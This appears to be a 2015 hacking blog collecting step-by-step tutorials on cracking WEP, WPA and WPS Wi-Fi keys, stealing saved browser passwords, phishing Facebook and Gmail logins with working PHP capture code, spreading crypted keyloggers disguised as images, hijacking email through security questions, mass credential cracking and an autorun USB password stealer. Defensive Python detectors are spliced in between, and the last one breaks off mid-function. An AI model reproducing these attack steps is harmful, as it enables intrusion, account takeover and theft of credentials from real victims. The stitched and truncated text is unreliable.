Saturday, 21 March 2015

Hack wifi wep

This chapter will teach you how to crack the WEP key of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial uses BackTrack 4, but it should work similarly in newer versions. BackTrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.

What you will need:

Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within Windows, or you can boot BackTrack straight off a DVD or flash drive. Instructions for each of these methods are on the BackTrack website.
Once you have booted up BackTrack, it will ask you for a username and password. Username: root, password: toor
Now type startx and press Enter. This will log you into BackTrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon in the bottom left corner of the screen.
Type in: airmon-ng
Look for the name of your wireless card; it's different for a lot of computers. Mine is wlan0, so that's what I'm going to use for the rest of this guide. Replace wlan0 in all the following steps with whatever your device name is.
Type: airmon-ng stop wlan0
Type: macchanger --mac 00:11:22:33:44:55 wlan0
Type: airmon-ng start wlan0
Type: airodump-ng wlan0
You will now see all of the WiFi networks in range. Once you've found the one you want to hack, press Ctrl + C to stop scanning. Take note of the BSSID and channel of the network you want to hack.
Type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0
Keep that window open, then open another command terminal and enter the following in the newly opened terminal:
Type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0
Type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0
Now go back to the first window; you'll notice a number steadily increasing. Once it's over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the number is even higher, try again at 15,000, and so on.
Open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap
You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When it's found the key, it will appear on the screen. You can now log into that network using the WEP key shown on the screen :)
NOTES:

Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take a while for you to get enough packets to crack the WEP key.

It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.
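The packet counter above is really about RC4 initialization vectors: WEP prefixes a 24-bit IV to the shared key, so keystreams start repeating after only a few thousand frames, and any two frames under the same IV leak the XOR of their plaintexts. The Python below is an added illustration, not code from the original tutorial; the RC4 routine, key and frame contents are constructed, and the statistical key-recovery that aircrack-ng actually runs (PTW/FMS) is deliberately not shown. For a network owner the lesson is simply that no amount of key length fixes this; WEP has to be replaced.

```python
"""Added example (not code from the original tutorial): why a WEP capture
becomes crackable once enough frames are collected. The RC4 code, the key
and the frame contents are constructed here for illustration; the actual
key-recovery statistics that aircrack-ng runs (PTW/FMS) are not shown."""
import math
from typing import Optional


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling (KSA) followed by the PRGA output stream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt_frame(iv: bytes, wep_key: bytes, payload: bytes) -> bytes:
    """WEP per-frame encryption: RC4 seeded with IV || key, XORed over the
    payload. The 24-bit IV is sent in the clear in front of the body.
    (The CRC-32 ICV that WEP appends is omitted; it does not change the point.)"""
    if len(iv) != 3:
        raise ValueError("WEP IVs are 24 bits")
    return iv + xor_bytes(payload, rc4_keystream(iv + wep_key, len(payload)))


def plaintext_xor_from_iv_reuse(frame1: bytes, frame2: bytes) -> Optional[bytes]:
    """If two captured frames carry the same IV they used the same keystream,
    so XORing the ciphertexts cancels it and yields plaintext1 XOR plaintext2
    without the key. Returns None when the IVs differ."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor_bytes(frame1[3:], frame2[3:])


def frames_until_iv_repeat(iv_bits: int = 24, probability: float = 0.5) -> int:
    """Birthday bound: frames with random IVs until one IV repeats with the
    given probability. For 24-bit IVs that is only a few thousand frames,
    which is why the packet counter in the tutorial matters so much."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    key = bytes.fromhex("0123456789")            # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"                         # same IV reused on two frames
    f1 = wep_encrypt_frame(iv, key, b"GET /index.html HTTP/1.1")
    f2 = wep_encrypt_frame(iv, key, b"POST /login HTTP/1.1")
    print(plaintext_xor_from_iv_reuse(f1, f2).hex())
    print(frames_until_iv_repeat())              # 4823
```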


Set up BackTrack for Wi-Fi hacking

This guide will show you how to download and set up BackTrack 5 to boot off USB or DVD, or to dual-boot. BackTrack 5 is a Linux build filled with a bunch of useful penetration testing tools, and will be used in the WiFi hacking tutorials as well as the PC hacking tutorials.

USB method
Using just a USB drive, you can run BackTrack on any computer without installing anything.

What you need:

4GB+ USB flash drive
Windows PC
BackTrack 5 ISO file
UNetbootin
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. The GNOME or KDE options don't matter, so you can choose either.
Download UNetbootin from http://unetbootin.sourceforge.net/ for Windows and install it.
Plug your USB drive into your PC.
Format the USB drive to FAT32. Note: this will delete all files on the flash drive.
Open UNetbootin and choose Diskimage.
Select the BackTrack 5 ISO file you downloaded.
Set the amount of space you would like to use for persistence, in MB.
Select your USB drive to create a bootable BackTrack 5.
Now when you plug your flash drive into any computer and turn it on, you can boot off the flash drive. If it doesn't do this automatically, open the computer's boot options at startup. Usually you can access this screen by pressing the Esc key while it's booting. Select your USB drive and BackTrack 5 will now boot up. When it asks you to log in, the username/password is root / toor.
DVD method
Using just a DVD, you can run BackTrack on any computer with a DVD drive without installing anything.

What you need:

Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn an ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero.
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. The GNOME or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack 5 ISO to DVD. It's recommended you choose the slowest burning speed.
Now when you insert your DVD into any computer and turn it on, you can boot off the disc. If it doesn't do this automatically, open the computer's boot options at startup. Usually you can access this screen by pressing the Esc key while it's booting. Select your DVD drive and BackTrack 5 will now boot up. When it asks you to log in, the username/password is root / toor.

Dual-boot method
Set up BackTrack 5 to dual boot alongside your Windows 7 installation. When you boot up your computer, you'll be able to choose whether to boot into Windows 7 or into BackTrack 5.

What you need:

Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn an ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero.
Download the BackTrack 5 ISO from http://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. The GNOME or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack 5 ISO to DVD. It's recommended you choose the slowest burning speed.
With the DVD in your drive, reboot and boot off the disc. If it doesn't do this automatically, open the computer's boot options at startup. Usually you can access this screen by pressing the Esc key while it's booting. Select your DVD drive and BackTrack 5 will now boot up. When it asks you to log in, the username/password is root / toor.
Once you're at the BackTrack 5 desktop, you will see an install file on the desktop. Run it and follow the steps until installation is complete. It will ask you for your language, time zone, and how much of your hard drive you'd like to use for BackTrack.
Reboot, and you will now have the option to boot into Windows 7 or BackTrack 5.


Tuesday, 17 March 2015

Hacking password for gmail and facebook

This tutorial will show you how to obtain all saved passwords on a computer, which may include e-mails and other accounts. This tutorial assumes you have physical access to the victim's computer.

Download and install Cain & Abel from here: http://www.oxid.it/cain.html
If you don't want to have to download and install software on the victim's computer, a USB bootable version is available.
Open Cain & Abel and click on Configure.
Select the device that has an IP (192.168.1.0 for example) and make sure "Don't use promiscuous mode" is checked. Click OK.
On the left, under the Decoders tab, there should be an IE 7 Passwords option. Choose that.
Click on the blue + icon.
You should now see all saved IE 7 passwords. You can use the other options on the left to see if you can recover any other stored passwords.
If the victim doesn't use IE or this method didn't work for any reason, you can Google "stored password recovery" and find a bunch of other tools that do similar things. Also, see the "USB password stealer" tutorial on this website.


Easy to hack anything with virus so why you don't try

Only use this method if the other methods didn't work for you, as this requires a little more work on your part. This method requires sending the victim a virus which will log their keystrokes and/or passwords and send them to you. If you don't do this well, it's possible your virus can be detected and removed by the person's antivirus software.

This method requires:

A trojan or keylogger of your choice. www.hackforums.net is a good resource for finding this. There are hundreds of different programs you can use.
A crypter. Crypting your virus is essential if you don't want your virus detected by an antivirus program. You can use the same link as above to find one, or you can even pay someone else around $5 on those forums to crypt your virus or keylogger for you. If your victim doesn't have antivirus, you may skip this, but it's not recommended.
A binder. Not required, but this will be useful if you want to attach your virus to, say, a picture file. This way you're not just sending someone a .exe, which will seem more suspicious than if you sent them a legit picture file which happens to have a virus attached to it. The person would never know you sent them a virus. Again, use Google or the above link to find one of these; there are many.
The first step is finding the trojan or keylogger of your choice. A trojan essentially is a virus that gives you access to a person's computer and lets you control/monitor a number of things, almost as if you were sitting at the computer itself. There are many different kinds, each with their own features and functions; most include a keylogger. A keylogger is a type of program or virus that simply monitors every key pressed and saves it into a log, which you can then access. www.hackforums.net is a good resource to find one of these, and it's really up to you which you use; the steps will all be the same.
Once you have your trojan server created, you need to have it crypted. This will help prevent your virus from being detected by antivirus. You can either find your own crypter or pay someone a small fee to crypt your virus for you. Search around online for this, as there are many out there.
Once you have a crypted virus, you may now use a binder if you like, to combine your virus with another program or file such as a picture. This is recommended, because a JPEG is a lot less suspicious than a .exe file.
Now that everything is ready, send your victim the file! You can trick them and tell them it's a cool picture, or host the file on a free host somewhere online and have them download it, saying it's a cool new song. Your method of getting the file to them is up to you and how creative you can be. Another way is to install it yourself, if you have access to their computer. Just put the file on a flash drive and install it when they aren't around.
Once they're infected, you can use the trojan/keylogger program to monitor their PC. The possibilities from here are practically endless, and mostly depend on what kind of trojan/keylogger you used.


Phishing hacking for hack gmail and facebook

This guide will walk you through making a fake email login page, facebook, or any other service which you can send to someone. Once they log in, you will have their password and they will never know.

What this requires:

A computer with internet
a little cleverness and creativity
First, head over to 000webhost.com and create a free PHP hosting account. Whatever you make the URL will be what you send the person, so you may want to make it clever or something they might believe, like amazingvideos.whatever.com
Once you've got your hosting created, it's time to make the fake login files. Go to the website of your choice (gmail.com, facebook.com, hotmail.com etc.), right click anywhere in the blank space and choose View Source. This will open the webpage's code in a notepad. Select it all and copy it.
Now paste all the code into a notepad and press Ctrl+F to search the document for action. Next to action you will see a URL in quotes; delete this and replace it with post.php
Save the document as index.htm and, if you're saving with Notepad, make sure you select All Files from the Save as type drop-down menu instead of Text Document.
Now open a new notepad, and type in the following code:

<?php
header ('Location: http://facebook.com ');
$handle = fopen("passes.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save this file as post.php and again, make sure you save as All Files and not Text Document.
Now go back to 000webhost.com and upload these two files to your hosting.
If everything was done correctly, when you send the person to your link, they will see a fake email login page. When they login, you can see their email and password in usernames.txt which will be created in your host where you uploaded the files. When they login, they will be redirected to the website you filled in.
NOTES: If you want to change where they're redirected to when they log in, change THE WEBSITE YOU PICKED in post.php file to the url of your choice.
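What gives the cloned page away is the form itself: the copied HTML still looks like the real site, but its action now points at post.php on whatever host the copy was uploaded to. The Python below is an added example, not the tutorial's code, that parses a page and flags password forms submitting outside the brand's own hosts; the HTML snippets, page URL and host names are constructed.

```python
"""Added example (not the tutorial's code): spot a cloned login page by where
its password form submits. HTML, URLs and host names below are constructed."""
from html.parser import HTMLParser
from typing import Iterable, List, Tuple
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Records each <form>'s action and whether it contains a password field."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[dict] = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _is_brand_host(host: str, brand_hosts: Iterable[str]) -> bool:
    return any(host == b or host.endswith("." + b) for b in brand_hosts)


def suspicious_login_forms(page_html: str, page_url: str,
                           brand_hosts: List[str]) -> List[Tuple[str, str]]:
    """Return (resolved action URL, reason) for every password form that does
    not submit to one of the brand's own hosts. The genuine site posts to its
    own domain; the copy from the steps above posts to post.php wherever it
    was uploaded, and a relative action resolves to that hosting domain."""
    parser = _FormCollector()
    parser.feed(page_html)
    flagged = []
    for form in parser.forms:
        if not form["password"]:
            continue
        target = urljoin(page_url, form["action"])
        host = (urlsplit(target).hostname or "").lower()
        if not _is_brand_host(host, brand_hosts):
            flagged.append((target, f"password form submits to {host!r}, "
                                    f"not to {', '.join(brand_hosts)}"))
    return flagged


if __name__ == "__main__":
    # Constructed clone: copied markup, action rewritten to post.php.
    clone = ('<form action="post.php" method="post"><input name="email">'
             '<input type="password" name="pass"></form>')
    for target, reason in suspicious_login_forms(
            clone, "http://amazingvideos.example.net/index.htm", ["facebook.com"]):
        print(target, "-", reason)
```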


Remote data stealer hacking

This popular stealer is back by popular demand, with new modifications and limitations. It decrypts all stored passwords in the internet browser. It works on Windows Vista and Windows 7 machines; it is in beta and only works on Chrome, Firefox, and IE. It is done in a Java applet, so they do need to run the applet for this to work. Luckily, the average user does not have much knowledge of computers, so a little social engineering should do the trick.

Basically, you register your email, pick a theme and it will give you a URL. Send the URL to a slave, use a bit of social engineering to get them to click on the link and run the applet. Once the applet is run, they will get a fake error message and the decrypted stored passwords and cookie files will be sent to your email.

It is 100% FUD. All the decryption is done through the applet, so it is not JDB, and no files are downloaded to the slave's computer, hence it won't trigger antivirus.

Go to: http://stealer.ambesty.com/
Read the instructions
Enter your email, click Signup/Login.
It will generate a URL per theme, send your slave the URL.
If all goes well, you should receive an email in your inbox with the decrypted data.


Monday, 16 March 2015

Social hacker engineering

This is probably the easiest method to get access to an e-mail account, and it really isn't hacking at all so much as it is playing off the stupidity of others. This will work for most e-mail services, such as Gmail, Yahoo, Hotmail, etc.
Here is a list of websites that will help you gather information you might need for this tutorial:

http://www.spokeo.com/
http://www.pipl.com/
http://www.zabasearch.com/
http://com.lullar.com/
http://www.emailfinder.com/
http://www.zoominfo.com/
The first step is to obtain the victim's e-mail address. This can be as easy as asking them for it in a non-suspicious way. The websites listed above can help you obtain their e-mail as well. Once you have their e-mail address, proceed to step 2.
For this example, we're going to presume our victim is using Gmail, but the steps are about the same for any other service. Go to Gmail and click "I cannot access my account". For other e-mail services, it may be "I forgot my password". What we're trying to do is get access to the security questions. Gmail won't ask you the questions right away; it will send a password reset e-mail to the alternate e-mail account. Gmail will only ask you the security questions if the person hasn't logged into their account in the 24 hours after you submit an "I cannot access my account" request.
Once you're asked the security questions, the only thing between you and their e-mail is the answers to said questions. Most questions are pretty easy to answer if you know the person. If you don't know them, just find out the answers. For example, one security question is "What is the name of your first dog?". If you know the person, this could be an easy answer. If you don't, you could try bringing it up smoothly in a conversation, or ask people close to the victim such as family or friends.
Once you've correctly answered the questions, you will be able to reset their password and gain access. Congrats :)
Most likely the person will end up resetting their password once they realize what has happened. If you want to leave a way for you to get back in, change their alternate e-mail. If their alternate e-mail is victim@yahoo.com, make an e-mail account with the same name on another service, so that you own an account such as victim@hotmail.com, and replace their alternate email with this. This way, they most likely won't notice their alternate was changed, and you can just have a password reset request sent to your new email account, allowing you to regain access :)
As always, this is for educational purposes only, and it is illegal to gain access to someone else's e-mail account. Only attempt this on your own accounts. Use at your own risk.


Account hacker

This tutorial will cover how to gather and crack logins for popular websites, such as Minecraft, Photobucket, porn sites, Facebook, and more. Note: this tutorial won't show you how to crack a specific person's account, but instead will crack random people's accounts. For specific target cracks, please view one of the other tutorials. NOTE: Not 100% of the logins will work. This is because someone may have hacked them before you and they may have been used too many times. Just try another login until you get a working one.

What you need:

This tutorial assumes you're using a Windows based PC
Athena v1.6 (google search this program for the download)
Apex Crack by Buddah (google search this program for the download)
Proxy Finder Enterprise Edition (google search or torrent a cracked version of this program. This app contains a torrent tutorial under Misc. Hacks)
Raptor 3 (google search this program for the download)
All of the above programs can be found in the forums at http://hackershandbook.org/forum/tools-and-programs/cracking-tools-apex-...
Open Athena
Click Start. The longer you let this run, the more websites and logins it will gather. You will get a few thousand in a few minutes. In the Athena folder, you will notice it created some text files. The logins.txt file contains direct login links you can copy and paste into the Firefox URL bar to log in directly. If you're just looking for a porn login, this may be your best bet and you can skip all further steps.
Click stop when you're done.
Open Raptor 3
Click on Generators in the bottom left corner
Click Pass Leecher
Right click in the white space and click on Add File or simply click the add file button
Select the logins.txt file that you generated from Athena
Click on Leech and then save the file by going to File > Save As..
Open Proxy finder
Click on Find
When it's finished, press OK and then Save the proxy list.
Open Apex and click on Site Settings
Select the website you want to crack login and passwords for in the drop down list.
Click on Proxy Lists
Click on Load and select the proxy list file you saved from Proxy Finder.
Click on Crack Lists
Click on Load and select the file you saved from raptor
Click Start. This will begin to crack the logins using the proxies in the list and save them to a txt file in the Apex folder. This is where your cracked accounts and passwords will be.
Once it finishes going through your list of proxies, you'll notice the Valid Proxies box on the right. Click on Send. This will make the cracker run only through the proxies that work, making the cracking process substantially faster.


USB stealer data hacking

This tutorial will walk you through setting up a USB flash drive to steal the saved passwords on a computer. If you're looking for a super tiny, super discreet flash drive, we recommend the SanDisk Cruzer Fit CZ33 64GB USB 2.0 Low-Profile Flash Drive, SDCZ33-064G-B35.

open notepad/wordpad

type:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save this as AUTORUN.inf
open a new notepad/wordpad document

type:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe /stext passwordfox.txt

start OperaPassView.exe /stext OperaPassView.txt

start ChromePass.exe /stext ChromePass.txt

start Dialupass.exe /stext Dialupass.txt

start netpass.exe /stext netpass.txt

start WirelessKeyView.exe /stext WirelessKeyView.txt

start BulletsPassView.exe /stext BulletsPassView.txt

start VNCPassView.exe /stext VNCPassView.txt

start OpenedFilesView.exe /stext OpenedFilesView.txt

start ProduKey.exe /stext ProduKey.txt

start USBDeview.exe /stext USBDeview.txt


save this as LAUNCH.bat
copy the autorun and launch file to your USB
go to http://www.nirsoft.net/ and download the programs named in step 2
extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB
click on the option perform a virus scan
(this is an example; if you want it to say something else, go to the autorun file and change it ;) )
go to my computer---> USB DRIVE and open it


You will now see some text files; if you open them you will see usernames and passwords.


NOTICE: this only recovers passwords that have once been saved on your computer
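From the defender's side, the artefact this tutorial leaves on a drive is distinctive: an autorun.inf that launches a batch file under a reassuring ACTION label, next to a set of NirSoft password-recovery executables. The Python below is an added example, not part of the original tutorial, that parses an autorun.inf and a drive's file list and reports those signs; the sample autorun text and file names are constructed from the steps above.

```python
"""Added example (not part of the original tutorial): a defender-side check
for the removable-media pattern described above, an autorun.inf launcher
beside a set of password-recovery executables. Inputs are constructed."""
import configparser
from typing import Dict, Iterable, List

# Utility names the tutorial's launch.bat invokes; NirSoft ships them as
# legitimate recovery tools, which is exactly why they get abused this way.
CREDENTIAL_DUMPERS = {
    "mspass.exe", "mailpv.exe", "iepv.exe", "pspv.exe", "passwordfox.exe",
    "operapassview.exe", "chromepass.exe", "dialupass.exe", "netpass.exe",
    "wirelesskeyview.exe", "bulletspassview.exe", "vncpassview.exe",
}
LAUNCHER_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [autorun] section as lower-cased keys; {} if absent or unparsable."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    section = next((s for s in cp.sections() if s.lower() == "autorun"), None)
    if section is None:
        return {}
    return {k.lower(): v.strip() for k, v in cp.items(section)}


def removable_media_findings(autorun_text: str, drive_files: Iterable[str]) -> List[str]:
    """Human-readable findings for one removable drive."""
    findings: List[str] = []
    entries = parse_autorun(autorun_text)
    names = {f.lower() for f in drive_files}
    for key in LAUNCHER_KEYS:
        if entries.get(key):
            target = entries[key].split()[0].lower()
            findings.append(f"autorun.inf {key}={entries[key]!r} launches {target}")
            if target.endswith((".bat", ".cmd", ".vbs")) and target in names:
                findings.append(f"launcher {target} is a script present on the drive")
    if entries.get("action"):
        findings.append(f"AutoPlay label is attacker-chosen text: {entries['action']!r}")
    dumpers = sorted(names & CREDENTIAL_DUMPERS)
    if dumpers:
        findings.append("password-recovery tools on drive: " + ", ".join(dumpers))
    return findings


if __name__ == "__main__":
    # Constructed from the tutorial's own autorun.inf and file list.
    sample_autorun = "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n"
    sample_files = ["AUTORUN.inf", "LAUNCH.bat", "mspass.exe", "ChromePass.exe", "holiday.jpg"]
    for line in removable_media_findings(sample_autorun, sample_files):
        print(line)
```

Since Microsoft's 2011 AutoRun update (KB971029) Windows no longer honours autorun.inf on USB flash media, so the launcher would need a click; the tools sitting on the drive are the stronger signal.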


Create keylogger

A keylogger is a program that runs in the background on someone's computer, logs every key they press, and then sends the log of all the pressed keys to the attacker. This essentially gives you the ability to collect all the usernames and passwords typed in.

What you need:
Vulcan logger - http://vulcantools.net/?mod=freetools&tool=Vulcan%20Logger
A new e-mail address specifically for keylogging

After you downloaded the program, open it up and you should see the builder. Input YOUR email username & password into the boxes. The reason we are doing this is because the keylogger will log INTO your email, then email yourself the logs. I recommend making a new email specifically for keylogging.


Select what email provider you are using here. If you are using gmail, select the first provider, if you are using yahoo, select the second provider, if you are using hotmail or live, select the third option.


Input the subject of the message you will receive every time you receive a keylog. Most people put "Facebook Logger" or something similar.


I recommend checking both of these boxes. The computer info will send the slave's IP address and their computer name. The screenshot will send a picture of the slave's screen whenever the log was sent.


This is the time in between the logs. I usually recommend 5-15 minutes.

At this point I suggest you click Test Email and make sure everything is working fine.


This is what the Icon of the output file will be. It will ONLY take in .ico's. If you do not have any, I suggest either downloading them online, or creating your own. At http://convertico.com/ you can upload a PNG file and it will convert it to ICO for you.
Some anti-viruses will detect an icon if it has been used before for malware, so I recommend getting some more obscure icons that have not been used before. After you locate the .ico it should appear in the box located to the right of the browse button.

Click the Extra Options Tab at the top of the builder.


The add to startup option will make the slave file go on startup on the slave's computer, so whenever he reboots his computer, he will become keylogged again. The melt option will make the file go hidden when it is first run. I usually recommend that you check both of them.


This option will allow you to display an error message when the file is first run by the slave. Common messages are "This file is not compatible with your computer."


The Use Downloader function will download and execute a file on the first run of the slave file. You can do this if you want it to execute many different viruses; it's a better alternative to binding. Make sure you put a direct link to the file.
The Website Visitor function will automatically visit the website on run. It will pop up in the default web browser.


I strongly recommend that you check both of these functions. They will decrease the detection rate and make your logger more secure from whalers. I also recommend that you click Generate Key a few times to get a unique key. This is generating an encryption key to keep all of your information secure.

Now click on the Assembly & Build Tab.


Click the "Randomly Generate" button. Now you can change the assembly to whatever you want it to say. For example, if you want to disguise this as a runescape product, you should change the company to "Jagex LTD." and the Product to "Runescape" and the Copyright to "Jagex LTD. All Rights Reserved". I do not suggest changing the version and File Version.
Below is an example:



This is a file pumper, it will increase the size of the output file. You should keep this at 0 unless you want to increase the size of your slave file.



Change the File Name to whatever you are disguising the file as, for example you can change it to "Runescape Pin Generator". Now click build. Wait a bit and it should give you the following message:

All you have to do now is go to the folder where your builder is located and you should notice your slave file. You


Crack wps

This tutorial was created by one of our members, bateman. THIS WILL ONLY WORK IF WPS IS ENABLED ON THE ROUTER. (It is on most routers.)
Boot up BackTrack 5, preferably the latest version.
If you aren't using the latest BackTrack, you'll need to download reaver. You can do this by connecting to the internet and typing the following in the command terminal: apt-get install reaver
Now you need to put your wireless card into monitor mode. On most PCs, your wireless card device name will be wlan0, so that's what we'll use for this tutorial. Type the following into the terminal: airmon-ng start wlan0
Next you need the MAC address of the router. To get this, type the following command: airodump-ng wlan0
You should now see a list of routers in range and their MAC addresses, along with channel etc. Copy the MAC address.
Next, you need to start up reaver. You can do this by simply typing reaver in the terminal and pressing Enter. This will show you all the available commands you can use in reaver, so feel free to play with the options.
Enter the following command: reaver -i mon0 -b MACADDRESSHERE -vv
Now let the program do its stuff; it can take as long as 40+ hours to crack a weak signal, but usually less than 24 hours. If you need to use your PC in the meantime, you can save the work done by reaver by pressing: CTRL+ALT+C
Note: this does not seem to work on BT (British Telecom) routers even if WPS is enabled. This is for educational purposes only. UPDATE: the Reaver program is now included in BackTrack 5 R2.
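Reaver's long run time comes from how a WPS PIN is structured: eight digits, the last of which is a checksum, and a registrar exchange that confirms the first four digits before the rest is checked, so the whole space is a few thousand tries rather than 10^8. The Python below is an added illustration, not bateman's or the reaver project's code, that computes the checksum and the resulting search space; the per-attempt timing is a constructed input, not a measurement. For a network owner the takeaway is to disable WPS, which removes the PIN entirely.

```python
"""Added example (not bateman's or reaver's code): the WPS PIN structure that
makes an online PIN guess feasible. Timing inputs are constructed."""


def wps_checksum_digit(first_seven: int) -> int:
    """Checksum over the first seven PIN digits (weights 3,1,3,1,... from
    the right). Only PINs whose 8th digit matches are well formed."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_well_formed_wps_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    return (len(pin) == 8 and pin.isdigit()
            and wps_checksum_digit(int(pin[:7])) == int(pin[7]))


def wps_search_space(halves_confirmed_separately: bool = True) -> int:
    """10^8 raw 8-digit values shrink to 10^7 because of the checksum, and
    because the registrar exchange acknowledges the first half before the
    second half is even checked, a guesser needs at most 10^4 + 10^3 tries."""
    return 10**4 + 10**3 if halves_confirmed_separately else 10**7


def worst_case_hours(attempts: int, seconds_per_attempt: float) -> float:
    """Upper bound on wall-clock time; AP lockouts and retries stretch it further."""
    return attempts * seconds_per_attempt / 3600


if __name__ == "__main__":
    print(is_well_formed_wps_pin("12345670"))           # True, the classic test PIN
    print(wps_search_space(), wps_search_space(False))  # 11000 10000000
    print(worst_case_hours(wps_search_space(), 3.0))    # ~9.2 h at a constructed 3 s per attempt
```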


Crack wpa

This chapter will teach you how to crack the WPA key of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial uses BackTrack 4, but it should work similarly in newer versions. BackTrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial. Cracking WPA isn't 100% going to work every time. It depends on how easy their WPA password is, and how good your dictionary file is.

What you will need:

Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=68b8d15896f4851257a33e8133350dd7#which_is_the_best_card_to_buy)
Dictionary file (backtrack comes with a couple)
Optional: Flash drive or blank DVD
Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within Windows, or you can boot BackTrack straight off of a DVD or flash drive. Instructions for each of these methods are on the BackTrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card; it's different for a lot of computers. Mine is wlan0, so for the rest of this guide that's what I'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. Once you've found the one you want to hack, press Ctrl + C to stop scanning. Take note of the BSSID and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -0 5 -a (enter bssid here) wlan0
type: aircrack-ng wpahack.cap -w (path to a dictionary file)
You should now see it attempting to crack the WPA key. This could take a while depending on how big the dictionary file is and how fast your computer is. When it's found the key, it will appear on the screen. You can now log into that network using the WPA key on the screen :)
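From the defender's side, the aireplay-ng -0 step above is visible on the air as a burst of 802.11 deauthentication frames spoofed from the access point's own address, which is exactly what a wireless IDS alerts on. The script below is an added example (not part of the original tutorial): it parses raw management frames and flags any transmitter that sends a burst of deauths; the frames and MAC addresses are constructed for the example.

```python
# Added example, not from the original tutorial: flag the deauth burst that
# "aireplay-ng -0" sends. Input: raw 802.11 management frames as a monitor-mode
# capture hands them over (radiotap header stripped). All data is constructed.
from collections import Counter

MGMT_TYPE = 0        # frame control type 00 = management
DEAUTH_SUBTYPE = 12  # management subtype 1100 = deauthentication
AP = bytes.fromhex("001122334455")   # hypothetical access point MAC
STA = bytes.fromhex("66778899aabb")  # hypothetical client MAC
BROADCAST = b"\xff" * 6

def mac_str(b: bytes) -> str:
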